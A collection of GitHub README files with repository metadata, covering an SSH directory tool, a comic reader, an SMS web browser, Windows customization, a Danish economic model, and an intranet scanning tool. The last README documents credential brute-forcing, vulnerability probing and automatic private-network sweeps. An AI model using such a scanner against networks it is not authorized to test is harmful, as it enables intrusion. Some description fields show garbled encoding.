# Wishlist <p> <a href="https://github.com/charmbracelet/wishlist/releases"><img src="https://img.shields.io/github/release/charmbracelet/wishlist.svg" alt="Latest Release"></a> <a href="https://pkg.go.dev/github.com/charmbracelet/wishlist?tab=doc"><img src="https://godoc.org/github.com/golang/gddo?status.svg" alt="GoDoc"></a> <a href="https://github.com/charmbracelet/wishlist/actions"><img src="https://github.com/charmbracelet/wishlist/workflows/build/badge.svg" alt="Build Status"></a> <a href="https://nightly.link/charmbracelet/wishlist/workflows/nightly/main"><img src="https://shields.io/badge/-Nightly%20Builds-orange?logo=hackthebox&logoColor=fff&style=appveyor"/></a> </p> The SSH directory ✨ ![Gif](https://vhs.charm.sh/vhs-3YDAKLasKh7IgWNTkHKrHB.gif) With Wishlist you can have a single entry point for multiple SSH endpoints, whether they are [Wish](https://github.com/charmbracelet/wish) apps or not. As a server, it can be used to start multiple SSH apps within a single package and list them over SSH. You can list apps provided elsewhere, too. You can also use the `wishlist` command to list and connect to servers in your `~/.ssh/config` or in a YAML configuration file. ## Installation Use your fave package manager: ```bash # macOS or Linux brew install charmbracelet/tap/wishlist # Arch Linux (btw) yay -S wishlist-bin # or yay -S wishlist # Windows (with winget) winget install wishlist # Windows (with Scoop) scoop bucket add charm https://github.com/charmbracelet/scoop-bucket.git scoop install wishlist # Nix nix-env -iA nixpkgs.wishlist # Debian/Ubuntu sudo mkdir -p /etc/apt/keyrings curl -fsSL https://repo.charm.sh/apt/gpg.key | sudo gpg --dearmor -o /etc/apt/keyrings/charm.gpg echo "deb [signed-by=/etc/apt/keyrings/charm.gpg] https://repo.charm.sh/apt/ * *" | sudo tee /etc/apt/sources.list.d/charm.list sudo apt update && sudo apt install wishlist # Fedora/RHEL echo '[charm] name=Charm baseurl=https://repo.charm.sh/yum/ enabled=1 gpgcheck=1 gpgkey=https://repo.charm.sh/yum/gpg.key' | sudo tee /etc/yum.repos.d/charm.repo sudo yum install wishlist ``` Or download a pre-compiled binary or package from the [releases][releases] page. Or just build it yourself (requires Go 1.19+): ```bash git clone https://github.com/charmbracelet/wishlist.git cd wishlist go build ./cmd/wishlist/ ``` [releases]: https://github.com/charmbracelet/wishlist/releases ## Usage ### CLI #### Remote If you just want a directory of existing servers, you can use the `wishlist` CLI and a YAML config file. You can also just run it without any arguments to list the servers in your `~/.ssh/config`. To start wishlist in server mode, you'll need to use the `serve` subcommand: ```sh wishlist serve ``` Check the [example config file](/_example/config.yaml) as well as `wishlist serve --help` for details. #### Local If you want to explore your `~/.ssh/config`, you can run wishlist in local mode with: ```sh wishlist ``` Note that not all options are supported at this moment. Check the [commented example config](/_example/config) for reference. ### Library Wishlist is also available as a library, which allows you to start several apps within the same process. Check out the `_example` folder for a working example. ## Auth ### Local mode When running in local mode, wishlist will first see if the current endpoint has an `IdentityFile` specified. If so, it'll try to use that. If not, it'll see if there's an SSH Agent available, and use it. Otherwise, it'll try the common key names in `~/.ssh`.
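For example, a host entry with an explicit `IdentityFile` (a minimal sketch; the host name and key path are placeholders for your own setup) would have that key tried first:

```sshconfig
Host myserver
  HostName myserver.example.com
  User me
  IdentityFile ~/.ssh/id_ed25519
```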
### Server mode When running as a server, wishlist will first try to forward the current SSH Agent. If there's no agent, it'll create or use an existing ed25519 key present in `.wishlist/client_ed25519`. Password authentication is not supported at this moment. ### Agent forwarding example ```sh eval (ssh-agent) ssh-add -k # adds all your pubkeys ssh-add -l # should list the added keys ssh \ -o 'ForwardAgent=yes' \ # forwards the agent -o 'UserKnownHostsFile=/dev/null' \ # do not add to ~/.ssh/known_hosts, optional -p 2222 \ # port foo.bar \ # host -t list # optional, app name ``` You can also add this to your `~/.ssh/config`, for instance: ```sshconfig Host wishlist HostName foo.bar Port 2222 ForwardAgent yes UserKnownHostsFile /dev/null ``` ## Discovery Wishlist can discover endpoints using Zeroconf, SRV Records, and [Tailscale][]. You can find a brief explanation and examples of all of them below. Run `wishlist --help` to see all the options. [Tailscale]: http://tailscale.com ### Tailscale You can configure Wishlist to find all nodes in your **tailnet** and add them as endpoints: ```bash wishlist --tailscale.net=your_tailnet_name --tailscale.key=tskey-api-abc123... ``` You can use the [Hints](#hints) to change the connection settings. #### OAuth authentication Tailscale API keys expire after 90 days. If you want something that doesn't require you to intervene every couple of months, use OAuth Clients: Create a client [here](https://login.tailscale.com/admin/settings/oauth). The only scope needed is `devices:read`. Instead of using `--tailscale.key` (or `$TAILSCALE_KEY`), set `--tailscale.client.id` and `--tailscale.client.secret` (or `$TAILSCALE_CLIENT_ID` and `$TAILSCALE_CLIENT_SECRET`, respectively). ### Zeroconf/Avahi/mDNS/Bonjour You can enable this using the `--zeroconf.enabled` flag: ```bash wishlist --zeroconf.enabled ``` Optionally, you can also specify a timeout with `--zeroconf.timeout` and which domain to look for with `--zeroconf.domain`. Wishlist will look for `_ssh._tcp` services in the given domain. You can use the [Hints](#hints) to change the connection settings. ### SRV records You can set Wishlist up to find nodes from DNS `SRV` records: ```bash wishlist --srv.domain example.com ``` By default, Wishlist will set the name of the endpoint to the `SRV` target. You can, however, customize that with a `TXT` record in the following format: ```txt wishlist.name full.address:22=thename ``` So, in this case, an `SRV` record pointing to `full.address` on port `22` will get the name `thename`. ### Hints You can use the `hints` key in the YAML configuration file to hint settings into discovered endpoints. Check the [example configuration file](/_example/config.yaml) to learn what options are available. If you're using an SSH configuration file as the Wishlist configuration file, it'll try to match the hosts with the rules in the given configuration. Otherwise, the services will simply be added to the list. The difference is that the hints themselves won't show in the TUI, whereas hosts in the SSH configuration will.
## Running it Wishlist will read and store all its information in a `.wishlist` folder in the current working directory: - the server keys - the client keys - known hosts - config files Config files may be provided in either YAML or SSH Config formats: - [example YAML](/_example/config.yaml) - [example SSH config](/_example/config) The config files are tried in the following order: - the `-config` flag in either YAML or SSH config formats - `.wishlist/config.yaml` - `.wishlist/config.yml` - `.wishlist/config` - `[[user config dir]]/wishlist/config.yaml`[^1] - `[[user config dir]]/wishlist/config.yml`[^1] - `[[user config dir]]/wishlist/config`[^1] - `$HOME/.ssh/config` - `/etc/ssh/ssh_config` [^1]: i.e. `[[user config dir]]`: On Unix systems, it will be `$XDG_CONFIG_HOME` as specified by https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html if non-empty, else `$HOME/.config`. On Darwin, it will be `$HOME/Library/Application Support`. On Windows, it will be `%AppData%`. On Plan 9, it will be `$home/lib`. The first one that is loaded and parsed without errors will be used. This means that if you have your commonly used hosts in your `~/.ssh/config`, you can simply run `wishlist` and get it running right away. It also means that if you don't want that, you can pass a path to `-config`, and it can be either a YAML or an SSH config file. ### Using the binary ```sh wishlist ``` ### Using Docker ```sh mkdir .wishlist $EDITOR .wishlist/config.yaml # either a YAML or an SSH config docker run \ -p 2222:22 \ -v $PWD/.wishlist:/.wishlist \ docker.io/charmcli/wishlist:latest ``` ### Supported SSH Options Not all SSH options are currently supported. Here's a list of the ones that are: - `User` - `Hostname` - `Port` - `IdentityFiles` - `ForwardAgent` - `RequestTTY` - `RemoteCommand` - `SendEnv` - `SetEnv` - `ConnectTimeout` - `Include` - `PreferredAuthentications` - `ProxyJump` ## Acknowledgments The gif above shows a lot of [Maas Lalani’s](https://github.com/maaslalani) [confeTTY](https://github.com/maaslalani/confetty). ## Feedback We’d love to hear your thoughts on this project. Feel free to drop us a note! - [Twitter](https://twitter.com/charmcli) - [The Fediverse](https://mastodon.social/@charmcli) - [Discord](https://charm.sh/chat) ## License [MIT](/LICENSE) --- Part of [Charm](https://charm.sh). <a href="https://charm.sh/"><img alt="The Charm logo" src="https://stuff.charm.sh/charm-badge.jpg" width="400"></a> <!--prettier-ignore--> Charm热爱开源 • Charm loves open source
The SSH directory โœจ
hacktoberfest,ssh
20
15
253
358
8
2
5
niuhuan/daisy
daisy ===== [![license](https://img.shields.io/github/license/niuhuan/daisy)](https://raw.githubusercontent.com/niuhuan/daisy/master/LICENSE) [![releases](https://img.shields.io/github/v/release/niuhuan/daisy)](https://github.com/niuhuan/daisy/releases) [![downloads](https://img.shields.io/github/downloads/niuhuan/daisy/total)](https://github.com/niuhuan/daisy/releases) A clean and elegant comic and light novel client that supports Android / iOS / macOS / Windows / Linux. This app contains content involving, or indirectly describing, "smoking / drinking / fighting / romance / sexuality", and is therefore rated "R12+PG14": it is recommended for users aged 12 and up, users under 14 should use it accompanied by a guardian, and local laws and regulations must be observed while using it. If you find this software helpful, you can star the repository to support it. Issues are also welcome to help make the software better. Repository: https://github.com/niuhuan/daisy ## Screenshots ![](images/st01.png) ![](images/st02.png) ![](images/st03.jpg) ![](images/st04.jpg) ## Architecture The client uses a front-end/back-end separated architecture, with Flutter as the rendering framework and Rust handling the low-level scheduling of networking and the file system. Since both Flutter and Rust are cross-platform languages, this enables support for Android / iOS / Windows / macOS and other operating systems. ![](https://raw.githubusercontent.com/fzyzcjy/flutter_rust_bridge/master/book/logo.png)
็พŽ่ง‚ๆ˜“็”จไธ”ๆ— ๅนฟๅ‘Š็š„ๆผซ็”ปๅ’Œ่ฝปๅฐ่ฏดๅฎขๆˆท็ซฏ, ๅŒๆ—ถๆ”ฏๆŒMacOS๏ผŒWindows๏ผŒAndroid๏ผŒiOSใ€‚็ฑปไผผๅŠจๆผซไน‹ๅฎถใ€‚
android,anime,bika,comic,comics-reader,flutter,pika,rust
29
2
1
89
8
1
1
lukeaschenbrenner/TxtNet-Browser
# TxtNet Browser ### Browse the Web over SMS, no WiFi or Mobile Data required! <p align="center"><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/app/src/main/ic_launcher-playstore.png" alt="App Icon" width="200"/></p> > **⏸️ Development of this project is currently on hiatus due to other ongoing commitments. However, fixes and improvements are planned when development continues in Q1 2024! ⏸️** TxtNet Browser is an Android app that allows anyone around the world to browse the web without a mobile data connection! It uses SMS as a medium for transmitting HTTP requests to a server where a pre-parsed HTML response is compressed using Google's [Brotli](https://github.com/google/brotli) compression algorithm and encoded using a custom Base-114 encoding format (based on [Basest](https://github.com/saxbophone/basest-python)). In addition, any user can act as a server using their own phone's primary phone number and a Wi-Fi/data connection at the press of a button, allowing for peer-to-peer distributed networks. ## Download ### See the **[releases page](https://github.com/lukeaschenbrenner/TxtNet-Browser/releases)** for an APK download of the TxtNet Browser client. A Google Play release is coming soon. TxtNet Browser is currently compatible with Android 4.4-13+. ## Running Server Instances (uptime not guaranteed) | Country | Phone Number | Notes | | :--- | :----: | :--- | | United States | +1(913)203-2719 | Supports SMS to all +1 (US/Canada) numbers in addition to [these countries](https://github.com/lukeaschenbrenner/TxtNet-Browser/issues/2#issuecomment-1510506701) | | | | | Let me know if you are interested in hosting a server instance for your area! > ⚠️ **Please note**: All web traffic should be considered unencrypted, as all requests are made over SMS and received in plaintext by the server! ## How it works (client) This app uses a permission that allows a broadcast receiver to receive and parse incoming SMS messages without the need for the app to be registered as the user's default messaging app. While granting an app SMS permissions poses a security concern, the code for this app is open source and all code involving the use of internet permissions is compartmentalized to the server module. This ensures that unless the app is set up to be a server, no internet traffic is transmitted. In addition, when acting as the client, the app only sends SMS messages programmatically to, and receives them from, a registered server phone number. The app communicates with a "server phone number", which is a phone number controlled by a "server host" that communicates directly over SMS using Android's SMS APIs. Each URL request is sent, encoded in a custom base 114, to the server. Usually, this only requires 1 SMS, but just in case, each message is prepended with an order specifier. When the server receives a request, the server uses an Android WebView component to programmatically request the website in a manner that simulates a regular request, to avoid restrictions some services (such as Cloudflare) place on HTTP clients. By doing this, any JavaScript can also execute on the website, allowing content to be dynamically loaded into the HTML if needed. Once the page is loaded, only the HTML is transferred back to the recipient device. The HTML is stripped of unnecessary tags and attributes, compressed into raw bytes, and then encoded.
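As a rough sketch of the order-specifier idea mentioned above (a hypothetical helper, not TxtNet's actual code; it also assumes the 160-character GSM-7 budget discussed next):

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical sketch: split an encoded payload into numbered segments,
// each fitting a single 160-character GSM-7 SMS, so the client can
// reassemble messages that arrive out of order.
class Segmenter {
    static List<String> toSegments(String encoded) {
        final int SMS_SIZE = 160;
        final int PREFIX = 4;                // room for an "NN:" order specifier
        final int BODY = SMS_SIZE - PREFIX;  // payload characters per SMS
        List<String> segments = new ArrayList<>();
        for (int start = 0, n = 0; start < encoded.length(); start += BODY, n++) {
            int end = Math.min(start + BODY, encoded.length());
            segments.add(n + ":" + encoded.substring(start, end));
        }
        return segments;
    }
}
```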
Once encoded, the messages are split into 160 character numbered segments (maximizing the [GSM-7 standard](https://en.wikipedia.org/wiki/GSM_03.38) SMS size) and sent to the client app for parsing and displaying. Side note: Compression savings have been estimated to be an average of 20% using Brotli, but oftentimes it can save much more! For example, the website `example.com` in stripped HTML is 285 characters, but only requires 2 SMS messages (189 characters) to receive. Even including the 225% overhead in data transmission, it is still more efficient! #### Why encode the HTML in the first place? SMS was created in 1984 to utilize the extra bytes from the data channels in phone signalling. It was originally conceived to only support 128 characters in a 7-bit alphabet. When further characters were required to support a subset of the UTF-8 character set, a new standard called UCS-2 was created. Still limited by the 140 bytes available, UCS-2 supports more characters (many of which show up in HTML documents) but limits SMS sizes to 70 characters per SMS. By encoding all data in GSM-7, more data can be sent per SMS message than sending the raw HTML over SMS. It is possible that it may be even more efficient to create an encoding system using all the characters available in UCS-2, but this limits compatibility and is out of the scope of the project. ## Server Hosting TxtNet Browser has been rewritten to include a built-in server hosting option inside the app. Instead of the now-deprecated Python server using a paid SMS API, any user can now act as a server host, allowing for distributed communication. To enable the background service, tap on the overflow menu and select "TxtNet Server Hosting". Once the necessary permissions are granted, you can press on the "Start Service" toggle to initialize a background service. TxtNet Server uses your primary mobile number associated with the active carrier subscription SIM as a number that others can add and connect to. Please note that this feature is still in early stages of development and likely has many issues. Please submit issue reports for any problems you encounter. For Android 4.4-6.0, you will need to run adb commands one time as specified in the app. For Android 6.0-10.0, you may also use Shizuku, but a PC will still be required once. For Android 11+, no PC is required to activate the server using [Shizuku](https://shizuku.rikka.app/guide/setup/). ##### Desktop Server Installation (Deprecated) <strike> The current source code is pointed at my own server, using a Twilio API with credits I have purchased. If you would like to run your own server, follow the instructions below: 1. Register for an account at [Twilio](https://twilio.com/), purchase a toll-free number with SMS capability, and purchase credits. (This project will not work with Twilio free accounts) 2. Create a Twilio application for the number. 3. Sign up for an [ngrok](http://ngrok.com/) account and download the ngrok application 4. Open the ngrok directory and run this command: `./ngrok tcp 5000` 5. Visit the [active numbers](https://console.twilio.com/US1/develop/phone-numbers/manage/incoming) page and add the ngrok url to the "A Message Comes In" section after selecting "webhook". For example: "https://xyz.ngrok.io/receive_sms" 6. Download the TxtNet Browser [server script](https://github.com/lukeaschenbrenner/TxtNet-Browser/blob/master/SMS_Server_Twilio.py) and install all the required modules using "pip install x" 7.
Add your Twilio API ID and Key into your environment variables, and run the script! `python3 ./SMS_Server_Twilio.py` 8. In the TxtNet Browser app, press the three dots and press "Change Server Phone Number". Enter the phone number you purchased from Twilio and press OK! </strike> ## FAQ/Troubleshooting Bugs: - Many carriers are unnecessarily rate limiting incoming text messages, so a page may look as though it "stalled" while loading on large pages. As of now the only way to fix this is to wait! - In congested networks, it's possible for a mobile carrier to drop one or more SMS messages before they are received by the client. Currently, the app has no logic to mitigate this issue, so any websites that have stalled for a significant amount of time should be requested again. - In Android 12 (or possibly a new version of Google Messages?), there is a new and "improved" messages blocking feature. This results in no SMS messages getting through when a number is blocked, which makes the blocking feature of TxtNet Browser break the app! Instead of blocking messages, to get around this "feature", you can silence message notifications from the server phone number. <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/silentMessages.png" alt="Silence Number" width="200"/> <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/Messages_Migrating_Popup.png" alt="Contacts Popup" width="200"/> <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/MigratingBlockedContacts.png" alt="Migrating Contacts" width="200"/> ## Screenshots (TxtNet 1.0) <table> <tr> <td> <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot1.png" alt="1" height = 640px ></td> <td><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot2.png" alt="2" height = 640px></td> </tr> <tr> <td><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot3.png" alt="3" height = 640px></td> <td><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot4.png" align="right" alt="4" height = 640px> </td> </tr> </table> ##### Demo (TxtNet 1.0) https://user-images.githubusercontent.com/5207700/191133921-ee39c87a-c817-4dde-b522-cb52e7bf793b.mp4 > Demo video shown above ## Development ### 🚧 **If you are skilled in Android UI design, your help would be greatly appreciated!** 🚧 A consistent theme and dark mode would be great additions to this app. Feel free to submit pull requests! I am a second-year CS student with basic knowledge of Android Development and Server Development, and greatly appreciate help and support from the community. ## Future Impact My long-term goal with this project is to eventually reach communities where such a service would be practically useful, which may include: - Those in countries with a low median income and prohibitively expensive data plans - Those who live under oppressive governments, with near impenetrable internet censorship If you think you might be able to help fund a local country code phone number or server, or have any other ideas, please get in contact with the email in my profile description! ## License GPLv3 - See LICENSE.md ## Credits Thank you to everyone who has contributed to the libraries used by this app, especially Brotli and Basest.
Special thanks goes to [ColdSauce](https://github.com/ColdSauce), whose project [Cosmos Browser](https://github.com/ColdSauce/CosmosBrowserAndroid) was the original inspiration for this project! My original reply to his Hacker News comment is [here](https://news.ycombinator.com/item?id=30685223#30687202). In addition, I would like to thank [Zachary Wander](https://www.xda-developers.com/implementing-shizuku/) from XDA for their excellent Shizuku implementation tutorial and [Aayush Atharva](https://github.com/hyperxpro/Brotli4j/) for the amazing foundation they created with Brotli4J, allowing for a streamlined forking process to create the library BrotliDroid used in this app.
An app that lets you browse the web over SMS
null
10
4
4
82
12
3
0
ramensoftware/windhawk
# Windhawk Windhawk aims to make it easier to customize Windows programs. For more details, see [the official website](https://windhawk.net/) and [the announcement](https://ramensoftware.com/windhawk). This repository is used to [report issues](https://github.com/ramensoftware/windhawk/issues) and to [discuss Windhawk](https://github.com/ramensoftware/windhawk/discussions). For discussing Windhawk mods, refer to [the windhawk-mods repository](https://github.com/ramensoftware/windhawk-mods). You're also welcome to join [the Windhawk Discord channel](https://discord.gg/WZgXScMud7) for a live discussion. ## Technical details High level architecture: ![High level architecture diagram](diagram.png) For technical details about the global injection and hooking method that is used, refer to the following blog post: [Implementing Global Injection and Hooking in Windows](https://m417z.com/Implementing-Global-Injection-and-Hooking-in-Windows/). ## Source code The Windhawk source code can be found in the `src` folder, which contains the following subfolders: * `windhawk`: The code of the main `windhawk.exe` executable and the 32-bit and 64-bit `windhawk.dll` engine libraries. * `vscode-windhawk`: The code of the VSCode extension that is responsible for UI operations such as installing mods and listing installed mods. * `vscode-windhawk-ui`: The UI part of the VSCode extension. A simple way to get started is by extracting the portable version of Windhawk with the official installer, building the part of Windhawk that you want to modify, and then replacing the corresponding files in the portable version with the newly built files. ## Additional resources Code which demonstrates the global injection and hooking method that is used can be found in this repository: [global-inject-demo](https://github.com/m417z/global-inject-demo).
The customization marketplace for Windows programs: https://windhawk.net/
null
10
1
3
7
34
1
0
DREAM-DK/MAKRO
# MAKRO 2023-March MAKRO is an economic model built to provide a good description of the Danish economy in both the short and the long run. In addition, the model is used to analyze how economic policy initiatives affect the economy, including the gradual transition to a long-run path. The model is developed by the MAKRO model group at [DREAM (Danish Research Institute for Economic Analysis and Modelling)](https://dreamgruppen.dk/) for use by the Danish Ministry of Finance and others. The model parameters, equations, and data as a whole have been selected such that the short and long-run properties are as empirically and theoretically well-founded as possible. Any changes to parameters, equations, or data are solely the user's responsibility, and we request that any changes be explicitly presented in any publication using MAKRO. ## 2023-March version This is the first publicly available non-beta release of MAKRO. It comes with batteries in the form of a stylized baseline starting in 2029, so users can simulate marginal policy experiments without requiring a data subscription or calibrating the model. Note that the stylized baseline is not a serious forecast of the Danish economy but is based on several simplified projection assumptions. As such, the baseline should only be used for marginal experiments rather than as a forecast on its own. ## Documentation The model documentation in English is included in this repository under [Documentation/Documentation.pdf](Documentation/Documentation.pdf). The documentation has been thoroughly improved and pruned for this release, and we highly recommend reading it! Variable names and documentation in the code are in Danish; however, comments regarding the structure of the code are in English for anyone looking for a template on how to structure a large model. ## Model source code The source code defining all the model equations can be found in the [model subdirectory](Model/). The run.cmd file shows the order in which the files are usually run. ### Modules The model is split into several modules, each defining a group of endogenous variables and exactly as many constraints. The separation is purely for user convenience rather than technical necessity, as, in the end, all the modules are solved simultaneously. - [aggregates](Model/aggregates.gms) - Calculates objects with ties to many other modules - [consumers](Model/consumers.gms) - Consumption decisions and budget constraint - [exports](Model/exports.gms) - Armington demand for exports of both domestically produced and imported goods - [finance](Model/finance.gms) - Firm financing and valuation - [government](Model/government.gms) - Government aggregation module - [GovRevenues](Model/GovRevenues.gms) - Government revenues (see also taxes module) - [GovExpenses](Model/GovExpenses.gms) - Government expenses - [HHincome](Model/HHincome.gms) - Household income and portfolio accounting - [IO](Model/IO.gms) - Details of the IO system. The different demand components are satisfied with domestic production competing with imports - [labor_market](Model/labor_market.gms) - Labor force participation, job searching and matching, and wage bargaining - [pricing](Model/pricing.gms) - Price rigidities, markups, and foreign prices - [production_private](Model/production_private.gms) Private sector production and demand for factors of production - [production_public](Model/production_public.gms) Public sector production and demand for factors of production - [struk](Model/struk.gms) - Structural levels, i.e.
potential output (Gross Value Added) and structural employment - [taxes](Model/taxes.gms) - Tax rates and revenues from taxes and duties closely related to the IO system ## GAMS and gamY MAKRO is written in GAMS but uses a pre-processor, *gamY*, that implements additional features convenient for working with large models. An installation of [GAMS](https://www.gams.com/) is needed to run MAKRO (we recommend using the latest version) as well as a license for both GAMS and the included Conopt4 solver. Note that students and academics may have access to a license through their university. The [paths.cmd](paths.cmd) file should be adjusted with the path to your local GAMS installation. We generally assume that users use Windows, but both GAMS and MAKRO should be compatible with other operating systems - Python files are typically included as alternatives to .cmd files. gamY can be run as a stand-alone executable or as a Python script - both are included in the [*gamY* subdirectory](gamY/). The [documentation for gamY](gamY/gamY.pdf) is also included. ## Text editor The recommended text editor for working with gamY is [Sublime Text 3](https://www.sublimetext.com/3), where the [gamY sublime package](https://packagecontrol.io/packages/gamY) provides syntax highlighting. In addition, Sublime can be opened using the [MAKRO.sublime-project](MAKRO.sublime-project) project file, which is set up for better search in sub-directories etc. ## Running shocks The [Analysis/Standard_shocks](Analysis/Standard_shocks) subdirectory contains files for running a large number of pre-defined shocks, and it is straightforward to disable existing shocks and add new custom shocks instead. This is done by editing [standard_shocks.gms](Analysis/Standard_shocks/standard_shocks.gms). The run file, [Analysis/Standard_shocks/run.cmd](Analysis/Standard_shocks/run.cmd), is set up to run this file, followed by two Python reporting files. For reporting on responses to shocks, we include a Python script, [plot_standard_shocks.py](Analysis/Standard_shocks/plot_standard_shocks.py), for making a combined report with many plots of responses to one or more shocks, comparing shock responses from one or more model versions, and/or multiple variations of the same shock. Shocks to be plotted can be added inside [shocks_to_plot.py](shocks_to_plot.py), and [variables_to_plot.py](variables_to_plot.py) controls which variables are plotted. [plot_shocks.py](Analysis/Standard_shocks/plot_shocks.py) is set up for making many detailed figures that illustrate the effects of a particular shock (without comparison between model versions or shock variations). ## Python packages For reporting and other purposes, we make use of several Python packages that can be installed using pip: ``` pip install dream-tools plotly numpy pandas scipy==1.8.1 statsmodels xlwings kaleido==0.1.0.post1 xhtml2pdf IPython ``` We also require the GAMS API package, which cannot be installed with pip. Installation instructions are found here: https://www.gams.com/latest/docs/API_PY_GETTING_STARTED.html
null
null
1
4
7
25
2
2
0
1n7erface/Template
# Template - Heuristic Intranet Scanning ![GitHub Repo stars](https://img.shields.io/github/stars/1n7erface/Template?color=success) ![GitHub forks](https://img.shields.io/github/forks/1n7erface/Template) ![GitHub all release](https://img.shields.io/github/downloads/1n7erface/Template/total?color=blueviolet) ![](https://img.shields.io/badge/KCon-%E5%85%B5%E5%99%A8%E8%B0%B1-red) ## 0x01 Disclaimer This tool is intended to provide security assessment and vulnerability scanning services. Please note the following when using it: - Users of this tool bear full responsibility for the results and consequences of its use. The tool is provided only as an aid and assumes no responsibility for the operations and decisions made by its users. - This tool strives to provide accurate and timely information and assessments, but cannot guarantee that it is completely error-free. Users should judge and verify the information provided by this tool themselves, and independently evaluate the results it produces. Please read and understand the above disclaimer carefully before using this tool. Using it indicates that you agree to these terms and accept the corresponding responsibility. ## 0x02 Advantages - All modules use a producer-consumer model: results are consumed as soon as they are produced. > After the port scanner finishes a batch of data, it is pushed onto a queue and immediately consumed by the brute-force and fingerprinting modules, so the scan process can be stopped at any time with the results obtained so far. This breaks with the traditional model of waiting for the port scan to finish before running the later stages. - All modules use heuristic scanning, aiming to probe targets with the fewest possible packets. > During port scanning, the top 15 protocols are identified through protocol recognition and probed accordingly. Vulnerability detection is performed only after web fingerprint recognition. This avoids the traditional problems of fixed port-to-service bindings and the heavy packet volume of blind vulnerability probing. - Strong web fingerprint support > Thanks to the 棱角社区 community for supporting this tool's web fingerprints; there are currently 900+ fingerprints, keeping fingerprint recognition one step ahead. - Extreme application concurrency > The brute-force, vulnerability detection, fingerprint recognition, and port scanning modules all handle data atomically to achieve maximum concurrency. ## 0x03 Parameters ``` ❯ ./App-arm64darwin-noupx _____ _ _ |_ _| | | | | | | ___ _ __ ___ _ __ | | __ _| |_ ___ | |/ _ \ '_' _ \| '_ \| |/ _' | __/ _ \ | | __/ | | | | | |_) | | (_| | || __/ \_/\___|_| |_| |_| .__/|_|\__,_|\__\___| | | by 1n7erface |_| [=] Load Success Usage of ./App-arm64darwin-noupx: -bt int BruteModule threadNum (default 200) -c string auto check 192 or 172 or 10 -e print error log -i string IP address of the host you want to scan,for example: 192.168.11.11-255 or 192.168.1.1/24 or /22 /15... -it int InfoModule threadNum (default 200) -nobrute skip brute -noping skip icmp alive -nopoc skip poc -o string output file name (default "output.txt") -onping only ping -p string custom port example: 80,8088,1-3000 -pw string Define a password dictionary for blasting -t int Timeout (default 4) -us string Define a user dictionary for blasting [=] end...... ``` - `-bt` > Expects a numeric value: the number of coroutines started by the brute-force module (default 200). - `-c` > Expects one of the strings "192", "172", or "10". The program automatically probes the corresponding range for live subnets and scans them: 192 covers 192.168.0.1-192.168.255.255, 172 covers 172.16.0.1-172.31.255.255, and 10 covers 10.0.0.1-10.255.255.255. Note that subnet liveness is determined by probing .1, .255, and 3 random IPs in between from each /24; if any one responds, the subnet is considered alive, so a certain chance of missed subnets is unavoidable. (The 10 range is not recommended; such a large range may produce unexpected errors.)
